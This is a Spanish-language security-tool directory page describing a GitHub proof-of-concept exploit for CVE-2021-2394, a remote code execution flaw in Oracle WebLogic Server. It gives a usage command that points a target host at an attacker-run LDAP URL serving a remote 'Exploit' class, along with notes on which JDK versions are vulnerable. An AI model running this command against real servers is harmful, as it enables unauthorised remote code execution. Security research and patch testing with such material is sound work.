Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-2394 — Exploit de prueba de concepto para CVE-2021-2394, una vulnerabilidad de ejecución remota de código en Oracle WebLogic Server. Utiliza deserialización LDAP o RMI para entregar un payload. | Kitploit
Herramientas/GitHubGitHub/lz2y/cve-2021-2394
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHublz2y/cve-2021-2394

CVE-2021-2394

Exploit de prueba de concepto para CVE-2021-2394, una vulnerabilidad de ejecución remota de código en Oracle WebLogic Server. Utiliza deserialización LDAP o RMI para entregar un payload.

Ver Repositorio
40203hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-2394

POC de CVE-2021-2394

  • Descargo de responsabilidad
    • El proyecto es solo para fines educativos. Cualquier consecuencia o pérdida directa o indirecta causada por pruebas no autorizadas será responsabilidad del usuario.
  • Notas

    • El POC utiliza IIOP para enviar paquetes. Agregue las dependencias correspondientes (las dependencias de la versión 12.2.1.3.0 se han colocado en la release).
    • Utilice una versión baja de JDK para instalar Weblogic y realizar pruebas.

      El método de explotación basado en RMI tiene restricciones de versión de JDK anteriores a 6u132, 7u131, 8u121. En las versiones 8u122 y posteriores, se agregó un mecanismo de lista blanca de deserialización, desactivando la carga remota de código RMI. El método de explotación basado en LDAP tiene restricciones de versión de JDK anteriores a 6u211, 7u201, 8u191, 11.0.1. En la versión 8u191, Oracle impuso restricciones al vector LDAP, publicó CVE-2018-3149 y desactivó la carga remota de clases JNDI. De: https://www.freebuf.com/vuls/279465.html

    • Si no se puede reproducir en un entorno de máquina virtual, consulte https://xz.aliyun.com/t/7498
  • Método de uso:

    • Inicie un servicio LDAP
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • Ejemplo: java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • Enlaces de referencia:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • Actualizaciones

    • 2021/8/15 Se eliminó algo de código innecesario.
  • Artículo de análisis

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
Descargar herramienta